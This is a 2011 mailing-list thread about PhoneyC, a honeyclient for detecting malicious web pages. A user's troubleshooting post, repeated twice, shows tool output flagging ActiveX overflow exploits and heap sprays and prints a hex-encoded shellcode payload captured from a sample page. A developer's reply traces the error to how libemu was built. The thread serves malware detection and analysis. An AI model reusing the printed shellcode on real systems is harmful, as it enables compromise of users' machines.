libemu.Emulator not found
83 views
Skip to first unread message
Marta
May 15, 2011, 2:16:00 PM5/15/11
to phoneyc
Hi!
I've been nearly all day fighting with this problem, searching
everywhere for similar problems, repeating the steps... but no luck
for me.
I've followed all instructions, and in both modes (Option 1 & option
2). Heapspray attacks are correctly detected and shellcodes are
detected but can't be executed.
libemu -> trunk version (0.2.0)
curl -> 7.19.7
python -> 2.6.5
(Ubuntu Server 10.04)
Could yo help me with this? I'm a beginner with honeyclients.
Thanks for your time and patience.
I leave here two execution samples:
*Shellcode can't be executed*:
sudo python ./phoneyc.py file://samples/4158.html
[2011-05-15 20:01:49] [ALERT] NeoTracePro.TraceTarget overflow in arg0
Log written into: log/ad5048081277127857aad08e0bfd5e55
====================================
|--------AID:1----------
|ATYPE:ALERT_SHELLCODE
|MESSAGE:Shellcode Detected!
|MISC:{}
|LENGTH:752
|SHELLCODE:
eb0359eb05e8f8ffffff494937494949494949494949494949494949515a6a625830423050416b41417232414241423242413042415838414250757a496b4c435a586b726d4d385969496f496f696f51704c4b324c446441344e6b4735474c4e6b634c7445325853315a4f4c4b726f75486e6b536f57503661486b63794e6b70346c4b64416a4e54714f304f696e4c6b344f30516444475a61395a544d44416f324a4b4964656b42746464713861655a456e6b636f65746551786b55366c4b666c504b4c4b514f476c4551786b7773546c6e6b4e69724c6134576c42414f3346514b6b31744c4b715350304c4b6150666c6c4b3430376c4c6d4c4b47306778414e73586e6e326e766e5a4c76304b4f48564246727375364358347374724248543732533472736f42746b4f7a707068584b586d4b4c774b30504b4f5a76536f6d594b5563564f716a4d533834426635724a4442396f385050686e3964494b456e4d30574b4f49465363305363633633536331535143304333634b4f4a7050667178496d524c435656334c494d316e7550684c64345a50706f374637396f4e36706a745043617635796f585061786d744e4d764e6d395277796f4e3633633365496f4a705358497537394e66704946374b4f4e366630763466346635696f48507a33424839777079784631695057396f6b665365696f68506536735a6534706631785173724d6f796d35317a427066394139584c6e694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b4f42553044596f7946636b70577272727146315051324a64417051327141454631396f6a7063584c6d6e395775584e4363496f6b66517a4b4f6b4f7567696f68504e6b3637396c4c4338445064496f5a764632496f7a7075386c306e6a4554714f46336b4f4e366b4f6e3062
|Now run it:
Traceback (most recent call last):
File "./phoneyc.py", line 194, in <module>
report(alerts)
File "./phoneyc.py", line 119, in report
shellcoderesult = alert.run_shellcode()
File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
31, in run_shellcode
return e.run_shellcode(self.shellcode,self.offset)
AttributeError: 'libemu.Emulator' object has no attribute
'run_shellcode'
*Heapspray attack detected ok*
sudo python ./phoneyc.py file://samples/Pps.html
[2011-05-15 19:59:35] [ALERT] PPStream (PowerPlayer.dll 2.0.1.3829)
ActiveX Remote Overflow Exploit in Logo property
Log written into: log/3a47adf41c41079156ee8c0fe439c70e
====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044,
'sec_char': '\x00'}
====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 12, 'sledge_cnt':
524045, 'sec_char': '\x8b'}
I've been nearly all day fighting with this problem, searching
everywhere for similar problems, repeating the steps... but no luck
for me.
I've followed all instructions, and in both modes (Option 1 & option
2). Heapspray attacks are correctly detected and shellcodes are
detected but can't be executed.
libemu -> trunk version (0.2.0)
curl -> 7.19.7
python -> 2.6.5
(Ubuntu Server 10.04)
Could yo help me with this? I'm a beginner with honeyclients.
Thanks for your time and patience.
I leave here two execution samples:
*Shellcode can't be executed*:
sudo python ./phoneyc.py file://samples/4158.html
[2011-05-15 20:01:49] [ALERT] NeoTracePro.TraceTarget overflow in arg0
Log written into: log/ad5048081277127857aad08e0bfd5e55
====================================
|--------AID:1----------
|ATYPE:ALERT_SHELLCODE
|MESSAGE:Shellcode Detected!
|MISC:{}
|LENGTH:752
|SHELLCODE:
eb0359eb05e8f8ffffff494937494949494949494949494949494949515a6a625830423050416b41417232414241423242413042415838414250757a496b4c435a586b726d4d385969496f496f696f51704c4b324c446441344e6b4735474c4e6b634c7445325853315a4f4c4b726f75486e6b536f57503661486b63794e6b70346c4b64416a4e54714f304f696e4c6b344f30516444475a61395a544d44416f324a4b4964656b42746464713861655a456e6b636f65746551786b55366c4b666c504b4c4b514f476c4551786b7773546c6e6b4e69724c6134576c42414f3346514b6b31744c4b715350304c4b6150666c6c4b3430376c4c6d4c4b47306778414e73586e6e326e766e5a4c76304b4f48564246727375364358347374724248543732533472736f42746b4f7a707068584b586d4b4c774b30504b4f5a76536f6d594b5563564f716a4d533834426635724a4442396f385050686e3964494b456e4d30574b4f49465363305363633633536331535143304333634b4f4a7050667178496d524c435656334c494d316e7550684c64345a50706f374637396f4e36706a745043617635796f585061786d744e4d764e6d395277796f4e3633633365496f4a705358497537394e66704946374b4f4e366630763466346635696f48507a33424839777079784631695057396f6b665365696f68506536735a6534706631785173724d6f796d35317a427066394139584c6e694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b694867735a73746e696a423741395038736c6a4b4e7732446d4b4e4732646c6d436e6d707a30386c6b6c6b4e4b635870724b4e4e5356764b4f42553044596f7946636b70577272727146315051324a64417051327141454631396f6a7063584c6d6e395775584e4363496f6b66517a4b4f6b4f7567696f68504e6b3637396c4c4338445064496f5a764632496f7a7075386c306e6a4554714f46336b4f4e366b4f6e3062
|Now run it:
Traceback (most recent call last):
File "./phoneyc.py", line 194, in <module>
report(alerts)
File "./phoneyc.py", line 119, in report
shellcoderesult = alert.run_shellcode()
File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
31, in run_shellcode
return e.run_shellcode(self.shellcode,self.offset)
AttributeError: 'libemu.Emulator' object has no attribute
'run_shellcode'
*Heapspray attack detected ok*
sudo python ./phoneyc.py file://samples/Pps.html
[2011-05-15 19:59:35] [ALERT] PPStream (PowerPlayer.dll 2.0.1.3829)
ActiveX Remote Overflow Exploit in Logo property
Log written into: log/3a47adf41c41079156ee8c0fe439c70e
====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044,
'sec_char': '\x00'}
====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 12, 'sledge_cnt':
524045, 'sec_char': '\x8b'}
Angelo Dell'Aera
May 17, 2011, 4:00:21 AM5/17/11
to pho...@googlegroups.com
On Sun, 15 May 2011 11:16:00 -0700 (PDT)
Marta <marta.m...@gmail.com> wrote:
Marta <marta.m...@gmail.com> wrote:
> Hi!
>
> I've been nearly all day fighting with this problem, searching
> everywhere for similar problems, repeating the steps... but no luck
> for me.
[..]
> Traceback (most recent call last):
> File "./phoneyc.py", line 194, in <module>
> report(alerts)
> File "./phoneyc.py", line 119, in report
> shellcoderesult = alert.run_shellcode()
> File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
> 31, in run_shellcode
> return e.run_shellcode(self.shellcode,self.offset)
> AttributeError: 'libemu.Emulator' object has no attribute
> 'run_shellcode'
Seems like you have compiled libemu with its own Python bindings
(--enable-python-bindings). Please try reinstalling libemu without
enabling this feature and then reinstall PhoneyC modules.
Let me know if everything works fine after that.
Ciao,
--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc. http://buffer.antifork.org
Metro Olografix
Reply all
Reply to author
Forward
0 new messages